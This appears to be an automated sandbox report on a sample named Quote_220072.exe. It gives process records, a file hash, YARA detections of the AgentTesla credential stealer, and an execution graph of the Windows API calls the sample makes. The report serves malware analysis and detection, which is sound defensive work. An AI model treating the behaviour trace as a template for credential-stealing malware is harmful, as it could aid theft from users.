                                                                            Target ID:0
                                                                            Start time:07:14:54
                                                                            Start date:01/11/2024
                                                                            Path:C:\Users\user\Desktop\Quote_220072.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Quote_220072.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'197'664 bytes
                                                                            MD5 hash:AC900546C8BF5B3BE3184502D0D2D7BA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:07:15:26
                                                                            Start date:01/11/2024
                                                                            Path:C:\Users\user\Desktop\Quote_220072.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Quote_220072.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'197'664 bytes
                                                                            MD5 hash:AC900546C8BF5B3BE3184502D0D2D7BA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:30.6%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:16.5%
                                                                              Total number of Nodes:826
                                                                              Total number of Limit Nodes:19
                                                                              execution_graph 2806 6ff8167a 2807 6ff816b7 2806->2807 2848 6ff82351 2807->2848 2809 6ff816be 2810 6ff817ef 2809->2810 2811 6ff816cf 2809->2811 2812 6ff816d6 2809->2812 2894 6ff81fcb 2811->2894 2878 6ff82049 2812->2878 2817 6ff81740 2822 6ff81791 2817->2822 2823 6ff81746 2817->2823 2818 6ff81722 2907 6ff82209 2818->2907 2819 6ff8170a 2837 6ff81700 2819->2837 2904 6ff82f9f 2819->2904 2820 6ff816eb 2821 6ff816f5 2820->2821 2826 6ff81702 2820->2826 2821->2837 2888 6ff82d14 2821->2888 2830 6ff82209 9 API calls 2822->2830 2925 6ff81f1e 2823->2925 2825 6ff81728 2917 6ff81668 2825->2917 2898 6ff817f7 2826->2898 2838 6ff8177e 2830->2838 2835 6ff81708 2835->2837 2836 6ff82209 9 API calls 2836->2838 2837->2817 2837->2818 2840 6ff817de 2838->2840 2928 6ff8200d 2838->2928 2840->2810 2843 6ff817e8 GlobalFree 2840->2843 2843->2810 2845 6ff817cf 2845->2840 2932 6ff815c5 2845->2932 2846 6ff817c2 FreeLibrary 2846->2845 2936 6ff812f8 GlobalAlloc 2848->2936 2850 6ff8237f 2937 6ff812f8 GlobalAlloc 2850->2937 2852 6ff82a3a GlobalFree GlobalFree GlobalFree 2853 6ff82a5a 2852->2853 2869 6ff82aa7 2852->2869 2854 6ff82af7 2853->2854 2859 6ff82a73 2853->2859 2853->2869 2855 6ff82b19 GetModuleHandleW 2854->2855 2854->2869 2857 6ff82b2a LoadLibraryW 2855->2857 2858 6ff82b3f 2855->2858 2856 6ff82947 GlobalAlloc 2872 6ff8238a 2856->2872 2857->2858 2857->2869 2944 6ff81f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2858->2944 2866 6ff812e1 2 API calls 2859->2866 2859->2869 2861 6ff829bd GlobalFree 2861->2872 2862 6ff8299f lstrcpyW 2862->2872 2863 6ff82b8e 2865 6ff82b9c lstrlenW 2863->2865 2863->2869 2864 6ff829af lstrcpyW 2864->2872 2945 6ff81f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2865->2945 2866->2869 2867 6ff82b4c 2867->2863 2876 6ff82b78 GetProcAddress 2867->2876 2869->2809 2870 6ff82bb6 2870->2869 2872->2852 2872->2856 2872->2861 2872->2862 2872->2864 2873 6ff82822 GlobalFree 2872->2873 2875 6ff829fb 2872->2875 2938 6ff812f8 GlobalAlloc 2872->2938 2939 6ff812e1 2872->2939 2873->2872 2875->2872 2942 6ff81309 GlobalSize GlobalAlloc 2875->2942 2876->2863 2880 6ff8205e 2878->2880 2879 6ff812e1 lstrcpynW GlobalAlloc 2879->2880 2880->2879 2881 6ff8208b 2880->2881 2883 6ff82124 GlobalAlloc WideCharToMultiByte 2880->2883 2884 6ff82154 GlobalAlloc CLSIDFromString 2880->2884 2885 6ff821be GlobalFree 2880->2885 2881->2880 2881->2885 2947 6ff81548 2881->2947 2952 6ff819db 2881->2952 2883->2885 2884->2880 2885->2880 2886 6ff816dc 2885->2886 2886->2819 2886->2820 2886->2837 2890 6ff82d26 2888->2890 2889 6ff82dcb ReadFile 2893 6ff82de9 2889->2893 2890->2889 2955 6ff82cbf 2893->2955 2895 6ff81fde 2894->2895 2896 6ff81fe9 GlobalAlloc 2895->2896 2897 6ff816d5 2895->2897 2896->2895 2897->2812 2902 6ff81823 2898->2902 2899 6ff818a8 2901 6ff818ac GlobalSize 2899->2901 2903 6ff818b5 2899->2903 2900 6ff81897 GlobalAlloc 2900->2903 2901->2903 2902->2899 2902->2900 2903->2835 2905 6ff82faa 2904->2905 2906 6ff82fea GlobalFree 2905->2906 2958 6ff812f8 GlobalAlloc 2907->2958 2909 6ff82280 MultiByteToWideChar 2913 6ff82211 2909->2913 2910 6ff822a6 StringFromGUID2 2910->2913 2911 6ff822b7 lstrcpynW 2911->2913 2912 6ff822ee GlobalFree 2912->2913 2913->2909 2913->2910 2913->2911 2913->2912 2914 6ff82325 GlobalFree 2913->2914 2915 6ff815eb 2 API calls 2913->2915 2959 6ff81638 2913->2959 2914->2825 2915->2913 2963 6ff812f8 GlobalAlloc 2917->2963 2919 6ff8166d 2920 6ff81f1e lstrcpyW 2919->2920 2921 6ff81677 2920->2921 2922 6ff815eb 2921->2922 2923 6ff81633 GlobalFree 2922->2923 2924 6ff815f4 GlobalAlloc lstrcpynW 2922->2924 2923->2838 2924->2923 2926 6ff81f5c lstrcpyW 2925->2926 2927 6ff81765 2925->2927 2926->2927 2927->2836 2929 6ff8201c 2928->2929 2930 6ff817a4 2928->2930 2929->2930 2931 6ff82033 GlobalFree 2929->2931 2930->2845 2930->2846 2931->2929 2933 6ff815dd 2932->2933 2934 6ff815eb 2 API calls 2933->2934 2935 6ff815e6 2934->2935 2935->2840 2936->2850 2937->2872 2938->2872 2946 6ff812f8 GlobalAlloc 2939->2946 2941 6ff812f0 lstrcpynW 2941->2872 2943 6ff81327 2942->2943 2943->2875 2944->2867 2945->2870 2946->2941 2948 6ff812f8 GlobalAlloc 2947->2948 2949 6ff81555 2947->2949 2948->2881 2950 6ff812e1 2 API calls 2949->2950 2951 6ff8156a 2950->2951 2951->2881 2953 6ff81a48 2952->2953 2954 6ff819ea VirtualAlloc 2952->2954 2953->2881 2954->2953 2956 6ff82cd8 2955->2956 2957 6ff82ccd GetLastError 2955->2957 2956->2837 2957->2956 2958->2913 2960 6ff8163f 2959->2960 2961 6ff81663 2959->2961 2960->2961 2962 6ff81648 lstrcpyW 2960->2962 2961->2913 2962->2961 2963->2919 3279 6ff8103a 3280 6ff81052 3279->3280 3281 6ff810c5 3280->3281 3282 6ff81081 3280->3282 3283 6ff81061 3280->3283 3285 6ff8156c GlobalFree 3282->3285 3295 6ff8156c 3283->3295 3290 6ff81079 3285->3290 3286 6ff81072 3288 6ff8156c GlobalFree 3286->3288 3287 6ff81091 GlobalSize 3289 6ff8109a 3287->3289 3288->3290 3291 6ff8109e GlobalAlloc 3289->3291 3292 6ff810af 3289->3292 3290->3287 3290->3289 3293 6ff815c5 2 API calls 3291->3293 3294 6ff810b8 GlobalFree 3292->3294 3293->3292 3294->3281 3297 6ff81572 3295->3297 3296 6ff81578 3296->3286 3297->3296 3298 6ff81584 GlobalFree 3297->3298 3298->3286 3327 6ff82ebf 3328 6ff82ed7 3327->3328 3329 6ff81309 2 API calls 3328->3329 3330 6ff82ef2 3329->3330 3341 40362d 3342 403653 3341->3342 3343 40363f SetTimer 3341->3343 3344 40365c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3342->3344 3345 4036aa 3342->3345 3343->3344 3344->3345 2413 404f70 2414 405111 2413->2414 2415 404f8f 2413->2415 2416 405125 GetDlgItem GetDlgItem 2414->2416 2419 40515e 2414->2419 2415->2414 2417 404f9b 2415->2417 2418 4054f8 18 API calls 2416->2418 2421 404fa0 SetWindowPos 2417->2421 2422 404fba 2417->2422 2423 405148 SetClassLongW 2418->2423 2420 4051b5 2419->2420 2432 401399 90 API calls 2419->2432 2433 40510c 2420->2433 2484 4054c6 2420->2484 2424 4050fd 2421->2424 2426 40500d 2422->2426 2427 404fbf ShowWindow 2422->2427 2431 401533 90 API calls 2423->2431 2523 405739 2424->2523 2429 405015 DestroyWindow 2426->2429 2430 40502f 2426->2430 2427->2424 2428 404fe4 GetWindowLongW 2427->2428 2428->2424 2434 405000 ShowWindow 2428->2434 2435 405446 2429->2435 2436 405034 SetWindowLongW 2430->2436 2437 405047 2430->2437 2431->2419 2438 40518e 2432->2438 2434->2424 2435->2433 2444 405479 ShowWindow 2435->2444 2436->2433 2437->2424 2442 405053 GetDlgItem 2437->2442 2438->2420 2443 405192 SendMessageW 2438->2443 2440 401533 90 API calls 2456 4051c7 2440->2456 2441 405448 DestroyWindow EndDialog 2441->2435 2445 405092 2442->2445 2446 40506f SendMessageW IsWindowEnabled 2442->2446 2443->2433 2444->2433 2449 4050a1 2445->2449 2450 4050b3 2445->2450 2451 4050e4 SendMessageW 2445->2451 2460 405099 2445->2460 2446->2433 2448 40508e 2446->2448 2448->2445 2449->2451 2449->2460 2454 4050ca 2450->2454 2455 4050bc 2450->2455 2451->2424 2452 4054f8 18 API calls 2452->2456 2459 401533 90 API calls 2454->2459 2517 401533 2455->2517 2456->2433 2456->2440 2456->2441 2456->2452 2475 405388 DestroyWindow 2456->2475 2487 405e98 2456->2487 2504 4054f8 2456->2504 2457 4050e2 2457->2424 2461 4050d1 2459->2461 2520 405936 2460->2520 2461->2424 2461->2460 2463 40524b GetDlgItem 2464 405272 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 2463->2464 2468 405266 2463->2468 2464->2468 2465 4052c7 GetSystemMenu EnableMenuItem SendMessageW 2466 4052f4 SendMessageW 2465->2466 2465->2468 2466->2468 2468->2464 2468->2465 2507 4054e1 SendMessageW 2468->2507 2508 405cf9 2468->2508 2511 406af8 lstrcpynW 2468->2511 2471 405326 lstrlenW 2472 405e98 17 API calls 2471->2472 2473 405340 SetWindowTextW 2472->2473 2512 401399 2473->2512 2475->2435 2476 4053a2 CreateDialogParamW 2475->2476 2476->2435 2477 4053d5 2476->2477 2478 4054f8 18 API calls 2477->2478 2479 4053e0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2478->2479 2480 401399 90 API calls 2479->2480 2481 405426 2480->2481 2481->2433 2482 40542e ShowWindow 2481->2482 2483 4054c6 SendMessageW 2482->2483 2483->2435 2485 4054de 2484->2485 2486 4054cf SendMessageW 2484->2486 2485->2456 2486->2485 2498 405ea3 2487->2498 2488 4060dc 2489 4060f1 2488->2489 2544 406af8 lstrcpynW 2488->2544 2489->2456 2491 4060a7 lstrlenW 2491->2498 2492 405fbc GetSystemDirectoryW 2492->2498 2494 405e98 10 API calls 2494->2491 2495 405fcf GetWindowsDirectoryW 2495->2498 2498->2488 2498->2491 2498->2492 2498->2494 2498->2495 2499 405ffc SHGetSpecialFolderLocation 2498->2499 2500 405e98 10 API calls 2498->2500 2502 406048 lstrcatW 2498->2502 2503 406d1b CharNextW CharNextW CharNextW CharNextW CharPrevW 2498->2503 2537 406955 2498->2537 2542 4065fd wsprintfW 2498->2542 2543 406af8 lstrcpynW 2498->2543 2499->2498 2501 406014 SHGetPathFromIDListW CoTaskMemFree 2499->2501 2500->2498 2501->2498 2502->2498 2503->2498 2505 405e98 17 API calls 2504->2505 2506 405503 SetDlgItemTextW 2505->2506 2506->2463 2507->2468 2509 405e98 17 API calls 2508->2509 2510 405d07 SetWindowTextW 2509->2510 2510->2468 2511->2471 2513 401413 2512->2513 2515 4013a3 2512->2515 2513->2456 2515->2513 2516 4013df MulDiv SendMessageW 2515->2516 2549 40154a 2515->2549 2516->2515 2518 401399 90 API calls 2517->2518 2519 401547 2518->2519 2519->2460 2521 405943 SendMessageW 2520->2521 2522 40593d 2520->2522 2521->2457 2522->2521 2524 405751 GetWindowLongW 2523->2524 2534 405807 2523->2534 2525 405766 2524->2525 2524->2534 2526 40579a 2525->2526 2527 40578e GetSysColor 2525->2527 2525->2534 2528 4057a8 SetBkMode 2526->2528 2529 40579e SetTextColor 2526->2529 2527->2526 2530 4057d0 2528->2530 2531 4057c1 GetSysColor 2528->2531 2529->2528 2532 4057d4 SetBkColor 2530->2532 2533 4057e1 2530->2533 2531->2530 2532->2533 2533->2534 2535 4057f1 DeleteObject 2533->2535 2536 4057fa CreateBrushIndirect 2533->2536 2534->2433 2535->2536 2536->2534 2545 4062b6 2537->2545 2540 4069bb 2540->2498 2541 40698a RegQueryValueExW RegCloseKey 2541->2540 2542->2498 2543->2498 2544->2489 2546 4062c5 2545->2546 2547 4062ce RegOpenKeyExW 2546->2547 2548 4062c9 2546->2548 2547->2548 2548->2540 2548->2541 2550 4015c3 2549->2550 2658 4015ce 2549->2658 2551 4016c1 2550->2551 2552 4017c2 2550->2552 2553 4015e6 2550->2553 2554 4018cb 2550->2554 2555 40160c 2550->2555 2556 4016ef 2550->2556 2557 4016af 2550->2557 2558 40182f 2550->2558 2559 401711 2550->2559 2560 401633 SetForegroundWindow 2550->2560 2561 4017d3 2550->2561 2562 401618 2550->2562 2563 4015f9 2550->2563 2564 40189b 2550->2564 2565 4018de 2550->2565 2566 40163f 2550->2566 2550->2658 2659 4015d5 2550->2659 2568 4016d1 ShowWindow 2551->2568 2569 4016d9 2551->2569 2572 40303e 17 API calls 2552->2572 2571 4015f0 PostQuitMessage 2553->2571 2553->2658 2576 40303e 17 API calls 2554->2576 2587 405d18 24 API calls 2555->2587 2663 40303e 2556->2663 2732 4065fd wsprintfW 2557->2732 2579 40303e 17 API calls 2558->2579 2573 40303e 17 API calls 2559->2573 2560->2658 2575 40303e 17 API calls 2561->2575 2660 403002 2562->2660 2595 401399 73 API calls 2563->2595 2574 40303e 17 API calls 2564->2574 2578 40303e 17 API calls 2565->2578 2599 403002 17 API calls 2566->2599 2566->2658 2568->2569 2581 4016e6 ShowWindow 2569->2581 2569->2658 2571->2658 2584 4017c8 2572->2584 2585 401718 2573->2585 2586 4018a2 SearchPathW 2574->2586 2588 4017da 2575->2588 2589 4018d2 2576->2589 2591 4018e5 2578->2591 2580 401835 GetFullPathNameW 2579->2580 2592 401857 2580->2592 2593 40184d 2580->2593 2581->2658 2582 405d18 24 API calls 2582->2658 2736 4065ad FindFirstFileW 2584->2736 2668 406ba3 CharNextW CharNextW 2585->2668 2586->2658 2587->2658 2597 40303e 17 API calls 2588->2597 2698 406a34 2589->2698 2590 40161e Sleep 2590->2658 2604 401906 2591->2604 2605 40190e 2591->2605 2592->2593 2607 4065ad 2 API calls 2592->2607 2601 401889 GetShortPathNameW 2593->2601 2593->2658 2595->2658 2600 4017e3 2597->2600 2599->2658 2603 40303e 17 API calls 2600->2603 2601->2658 2602 401780 2602->2555 2606 401790 2602->2606 2609 4017ec MoveFileW 2603->2609 2744 406af8 lstrcpynW 2604->2744 2745 406af8 lstrcpynW 2605->2745 2686 405d18 2606->2686 2613 40186a 2607->2613 2609->2555 2614 401804 2609->2614 2613->2593 2743 406af8 lstrcpynW 2613->2743 2623 4065ad 2 API calls 2614->2623 2614->2658 2615 40190c 2702 406d1b 2615->2702 2616 401919 2746 406534 lstrlenW CharPrevW 2616->2746 2627 401814 2623->2627 2625 4017a2 SetCurrentDirectoryW 2625->2658 2627->2658 2739 40621b MoveFileExW 2627->2739 2628 401720 2628->2602 2630 401769 GetFileAttributesW 2628->2630 2674 4065d4 2628->2674 2678 4064da 2628->2678 2681 405e1c CreateDirectoryW 2628->2681 2733 405dfc CreateDirectoryW 2628->2733 2630->2628 2631 4065ad 2 API calls 2653 40192b 2631->2653 2632 401968 2749 406b7b GetFileAttributesW 2632->2749 2636 40193f CompareFileTime 2636->2653 2637 401a18 2638 405d18 24 API calls 2637->2638 2641 401a24 2638->2641 2639 4019fd 2640 405d18 24 API calls 2639->2640 2640->2658 2712 403148 2641->2712 2642 406af8 lstrcpynW 2642->2653 2645 401a52 SetFileTime 2646 401a60 CloseHandle 2645->2646 2648 401a73 2646->2648 2646->2658 2647 405e98 17 API calls 2647->2653 2649 401a78 2648->2649 2650 401a89 2648->2650 2651 405e98 17 API calls 2649->2651 2652 405e98 17 API calls 2650->2652 2654 401a80 lstrcatW 2651->2654 2655 401a91 2652->2655 2653->2631 2653->2632 2653->2636 2653->2637 2653->2639 2653->2642 2653->2647 2653->2659 2711 4068f9 GetFileAttributesW CreateFileW 2653->2711 2752 406a86 2653->2752 2654->2655 2657 406a86 MessageBoxIndirectW 2655->2657 2657->2658 2658->2515 2659->2582 2659->2658 2661 405e98 17 API calls 2660->2661 2662 403016 2661->2662 2662->2590 2664 405e98 17 API calls 2663->2664 2665 403067 2664->2665 2666 4016f6 SetFileAttributesW 2665->2666 2667 406d1b 5 API calls 2665->2667 2666->2658 2667->2666 2669 406bc1 2668->2669 2673 406bf8 2668->2673 2670 406bd0 CharNextW 2669->2670 2671 406bd5 2669->2671 2670->2673 2672 4065d4 CharNextW 2671->2672 2671->2673 2672->2671 2673->2628 2675 4065e0 2674->2675 2676 4065fa 2674->2676 2675->2676 2677 4065e9 CharNextW 2675->2677 2676->2628 2677->2675 2677->2676 2756 4068c4 GetModuleHandleA 2678->2756 2682 405e67 GetLastError 2681->2682 2683 405e8a 2681->2683 2682->2683 2684 405e74 SetFileSecurityW 2682->2684 2683->2628 2684->2683 2685 405e8e GetLastError 2684->2685 2685->2683 2687 405d2a 2686->2687 2696 401797 2686->2696 2688 405d49 lstrlenW 2687->2688 2689 405e98 17 API calls 2687->2689 2690 405d5b lstrlenW 2688->2690 2691 405d7e 2688->2691 2689->2688 2692 405d70 lstrcatW 2690->2692 2690->2696 2693 405d95 2691->2693 2694 405d88 SetWindowTextW 2691->2694 2692->2691 2695 405d9a SendMessageW SendMessageW SendMessageW 2693->2695 2693->2696 2694->2693 2695->2696 2697 406af8 lstrcpynW 2696->2697 2697->2625 2699 406a41 GetTickCount GetTempFileNameW 2698->2699 2700 406a75 2699->2700 2701 406a79 2699->2701 2700->2699 2700->2701 2701->2658 2703 406d30 2702->2703 2704 406db2 2703->2704 2706 406da3 CharNextW 2703->2706 2707 4065d4 CharNextW 2703->2707 2709 406d8f CharNextW 2703->2709 2710 406d9e CharNextW 2703->2710 2705 406dba CharPrevW 2704->2705 2708 406dda 2704->2708 2705->2704 2706->2703 2706->2704 2707->2703 2708->2653 2709->2703 2710->2706 2711->2653 2713 403190 2712->2713 2714 403183 2712->2714 2765 406926 ReadFile 2713->2765 2772 403131 SetFilePointer 2714->2772 2718 401a3a 2718->2645 2718->2646 2719 4031b6 GetTickCount 2719->2718 2727 4031e6 2719->2727 2720 4032f9 2721 403340 2720->2721 2725 4032fd 2720->2725 2723 40311b ReadFile 2721->2723 2723->2718 2724 40311b ReadFile 2724->2725 2725->2718 2725->2724 2726 4069e9 WriteFile 2725->2726 2726->2725 2727->2718 2728 40323d GetTickCount 2727->2728 2729 40326e MulDiv wsprintfW 2727->2729 2767 40311b 2727->2767 2770 4069e9 WriteFile 2727->2770 2728->2727 2730 405d18 24 API calls 2729->2730 2730->2727 2732->2658 2734 405e16 2733->2734 2735 405e0e GetLastError 2733->2735 2734->2628 2735->2734 2737 4065c3 FindClose 2736->2737 2738 4065ce 2736->2738 2737->2738 2738->2658 2740 40623c 2739->2740 2741 40622f 2739->2741 2740->2555 2773 4062e4 2741->2773 2743->2593 2744->2615 2745->2616 2747 406551 lstrcatW 2746->2747 2748 40191f lstrcatW 2746->2748 2747->2748 2748->2615 2750 406b9d 2749->2750 2751 406b8d SetFileAttributesW 2749->2751 2750->2653 2751->2750 2755 406a9b 2752->2755 2753 406ae9 2753->2653 2754 406ab1 MessageBoxIndirectW 2754->2753 2755->2753 2755->2754 2757 4068e6 GetProcAddress 2756->2757 2758 4068dc 2756->2758 2759 4064e1 2757->2759 2762 40617c GetSystemDirectoryW 2758->2762 2759->2628 2761 4068e2 2761->2757 2761->2759 2763 40619e wsprintfW LoadLibraryExW 2762->2763 2763->2761 2766 4031a2 2765->2766 2766->2718 2766->2719 2766->2720 2768 406926 ReadFile 2767->2768 2769 40312e 2768->2769 2769->2727 2771 406a0a 2770->2771 2771->2727 2772->2713 2774 406314 2773->2774 2775 40633a GetShortPathNameW 2773->2775 2800 4068f9 GetFileAttributesW CreateFileW 2774->2800 2776 40641a 2775->2776 2777 40634f 2775->2777 2776->2740 2777->2776 2779 406357 wsprintfA 2777->2779 2781 405e98 17 API calls 2779->2781 2780 40631e CloseHandle GetShortPathNameW 2780->2776 2782 406332 2780->2782 2783 406380 2781->2783 2782->2775 2782->2776 2801 4068f9 GetFileAttributesW CreateFileW 2783->2801 2785 40638d 2785->2776 2786 406398 GetFileSize GlobalAlloc 2785->2786 2787 406413 CloseHandle 2786->2787 2788 4063b7 2786->2788 2787->2776 2789 406926 ReadFile 2788->2789 2790 4063bf 2789->2790 2790->2787 2802 406b14 lstrlenA lstrlenA 2790->2802 2793 4063d2 lstrcpyA 2797 4063e4 2793->2797 2794 40641f 2795 406b14 3 API calls 2794->2795 2795->2797 2796 4063f5 SetFilePointer 2798 4069e9 WriteFile 2796->2798 2797->2796 2799 40640c GlobalFree 2798->2799 2799->2787 2800->2780 2801->2785 2803 4063ce 2802->2803 2804 406b33 2802->2804 2803->2793 2803->2794 2804->2803 2805 406b60 lstrlenA 2804->2805 2805->2803 2805->2804 2964 6ff81a4a 2965 6ff81a5a VirtualProtect 2964->2965 2966 6ff81aa1 2964->2966 2965->2966 3299 6ff82c6a 3300 6ff82cc3 3299->3300 3301 6ff82cd8 3300->3301 3302 6ff82ccd GetLastError 3300->3302 3302->3301 3303 6ff81b0a 3304 6ff81b38 3303->3304 3305 6ff82351 21 API calls 3304->3305 3306 6ff81b3f 3305->3306 3307 6ff81b52 3306->3307 3308 6ff81b46 3306->3308 3310 6ff81b5c 3307->3310 3311 6ff81b73 3307->3311 3309 6ff815eb 2 API calls 3308->3309 3314 6ff81b50 3309->3314 3315 6ff815c5 2 API calls 3310->3315 3312 6ff81b79 3311->3312 3313 6ff81b9f 3311->3313 3317 6ff81668 2 API calls 3312->3317 3318 6ff815c5 2 API calls 3313->3318 3316 6ff81b61 3315->3316 3319 6ff81668 2 API calls 3316->3319 3320 6ff81b7e 3317->3320 3318->3314 3321 6ff81b67 3319->3321 3322 6ff815eb 2 API calls 3320->3322 3323 6ff815eb 2 API calls 3321->3323 3324 6ff81b84 GlobalFree 3322->3324 3325 6ff81b6d GlobalFree 3323->3325 3324->3314 3324->3325 3331 6ff81000 3334 6ff8101b 3331->3334 3335 6ff8156c GlobalFree 3334->3335 3336 6ff81020 3335->3336 3337 6ff81032 3336->3337 3338 6ff81024 GlobalAlloc 3336->3338 3339 6ff815c5 2 API calls 3337->3339 3338->3337 3340 6ff81019 3339->3340 2967 4036da SetErrorMode GetVersionExW 2968 403725 GetVersionExW 2967->2968 2970 40375c 2967->2970 2969 403747 2968->2969 2969->2970 2971 4037c3 2970->2971 2972 4068c4 5 API calls 2970->2972 2973 40617c 3 API calls 2971->2973 2972->2971 2974 4037d9 lstrlenA 2973->2974 2974->2971 2975 4037e7 2974->2975 2976 4068c4 5 API calls 2975->2976 2977 4037ee 2976->2977 2978 4068c4 5 API calls 2977->2978 2979 4037f5 2978->2979 2980 4068c4 5 API calls 2979->2980 2981 403801 #17 OleInitialize SHGetFileInfoW 2980->2981 3057 406af8 lstrcpynW 2981->3057 2984 40384f GetCommandLineW 3058 406af8 lstrcpynW 2984->3058 2986 403860 2987 4065d4 CharNextW 2986->2987 2988 40389a CharNextW 2987->2988 2989 403988 GetTempPathW 2988->2989 2992 4038b3 2988->2992 3059 403c83 2989->3059 2991 4039a0 2993 4039a4 GetWindowsDirectoryW lstrcatW 2991->2993 2994 4039fa DeleteFileW 2991->2994 2992->2989 2997 4065d4 CharNextW 2992->2997 3007 403974 2992->3007 2996 403c83 12 API calls 2993->2996 3069 4033cb GetTickCount GetModuleFileNameW 2994->3069 2999 4039c0 2996->2999 2997->2992 2998 403a0d 3000 403a90 2998->3000 3002 403a82 2998->3002 3004 4065d4 CharNextW 2998->3004 2999->2994 3001 4039c4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2999->3001 3176 4036b0 3000->3176 3003 403c83 12 API calls 3001->3003 3097 405a1c 3002->3097 3008 4039f2 3003->3008 3018 403a2c 3004->3018 3158 406af8 lstrcpynW 3007->3158 3008->2994 3008->3000 3011 403bd7 3015 406a86 MessageBoxIndirectW 3011->3015 3012 403bea 3013 403bf3 GetCurrentProcess OpenProcessToken 3012->3013 3014 403be2 ExitProcess 3012->3014 3016 403c0b LookupPrivilegeValueW AdjustTokenPrivileges 3013->3016 3017 403c3f 3013->3017 3015->3014 3016->3017 3022 4068c4 5 API calls 3017->3022 3019 403a56 3018->3019 3020 403a97 3018->3020 3159 406616 3019->3159 3023 4064da 5 API calls 3020->3023 3025 403c46 3022->3025 3026 403a9c lstrcatW 3023->3026 3028 403c5b ExitWindowsEx 3025->3028 3032 403c68 3025->3032 3029 403ac0 lstrcatW lstrcmpiW 3026->3029 3030 403ab1 lstrcatW 3026->3030 3028->3014 3028->3032 3029->3000 3033 403ae7 3029->3033 3030->3029 3035 401533 90 API calls 3032->3035 3036 403af0 3033->3036 3037 403af7 3033->3037 3034 403a77 3174 406af8 lstrcpynW 3034->3174 3035->3014 3040 405e1c 4 API calls 3036->3040 3038 405dfc 2 API calls 3037->3038 3041 403afc SetCurrentDirectoryW 3038->3041 3042 403af5 3040->3042 3043 403b10 3041->3043 3044 403b1f 3041->3044 3042->3041 3175 406af8 lstrcpynW 3043->3175 3154 406af8 lstrcpynW 3044->3154 3047 405e98 17 API calls 3048 403b4f DeleteFileW 3047->3048 3049 403b5a CopyFileW 3048->3049 3054 403b2d 3048->3054 3049->3054 3050 403bb3 3051 40621b 35 API calls 3050->3051 3051->3000 3052 40621b 35 API calls 3052->3054 3053 405e98 17 API calls 3053->3054 3054->3047 3054->3050 3054->3052 3054->3053 3056 403b9e CloseHandle 3054->3056 3155 4066b4 CreateProcessW 3054->3155 3056->3054 3057->2984 3058->2986 3060 406d1b 5 API calls 3059->3060 3061 403c8f 3060->3061 3062 403c99 3061->3062 3063 406534 3 API calls 3061->3063 3062->2991 3064 403ca1 3063->3064 3065 405dfc 2 API calls 3064->3065 3066 403ca7 3065->3066 3067 406a34 2 API calls 3066->3067 3068 403cb2 3067->3068 3068->2991 3183 4068f9 GetFileAttributesW CreateFileW 3069->3183 3071 40340d 3088 40341a 3071->3088 3184 406af8 lstrcpynW 3071->3184 3073 403430 3185 406cee lstrlenW 3073->3185 3077 403441 GetFileSize 3078 40345a 3077->3078 3094 403548 3077->3094 3080 40311b ReadFile 3078->3080 3082 403616 3078->3082 3078->3088 3091 403367 6 API calls 3078->3091 3078->3094 3080->3078 3081 403557 3083 403598 GlobalAlloc 3081->3083 3081->3088 3201 403131 SetFilePointer 3081->3201 3085 403367 6 API calls 3082->3085 3202 403131 SetFilePointer 3083->3202 3085->3088 3087 403574 3090 406926 ReadFile 3087->3090 3088->2998 3089 4035b5 3092 403148 31 API calls 3089->3092 3093 403586 3090->3093 3091->3078 3095 4035c4 3092->3095 3093->3083 3093->3088 3190 403367 3094->3190 3095->3088 3095->3095 3096 4035f4 SetFilePointer 3095->3096 3096->3088 3098 4068c4 5 API calls 3097->3098 3099 405a30 3098->3099 3100 405a39 3099->3100 3101 405a4b 3099->3101 3222 4065fd wsprintfW 3100->3222 3102 406955 3 API calls 3101->3102 3103 405a7a 3102->3103 3104 405a99 lstrcatW 3103->3104 3106 406955 3 API calls 3103->3106 3107 405a49 3104->3107 3106->3104 3207 40595d 3107->3207 3110 406616 18 API calls 3111 405acb 3110->3111 3112 405b65 3111->3112 3114 406955 3 API calls 3111->3114 3113 406616 18 API calls 3112->3113 3115 405b6b 3113->3115 3116 405afe 3114->3116 3117 405b7b LoadImageW 3115->3117 3120 405e98 17 API calls 3115->3120 3116->3112 3123 405b22 lstrlenW 3116->3123 3127 4065d4 CharNextW 3116->3127 3118 405c28 3117->3118 3119 405bab RegisterClassW 3117->3119 3122 401533 90 API calls 3118->3122 3121 405bdf SystemParametersInfoW CreateWindowExW 3119->3121 3153 405bd8 3119->3153 3120->3117 3121->3118 3126 405c2e 3122->3126 3124 405b32 lstrcmpiW 3123->3124 3125 405b58 3123->3125 3124->3125 3129 405b42 GetFileAttributesW 3124->3129 3130 406534 3 API calls 3125->3130 3132 40595d 18 API calls 3126->3132 3126->3153 3128 405b1d 3127->3128 3128->3123 3131 405b4e 3129->3131 3133 405b5e 3130->3133 3131->3125 3134 406cee 2 API calls 3131->3134 3135 405c3b 3132->3135 3223 406af8 lstrcpynW 3133->3223 3134->3125 3137 405c47 ShowWindow 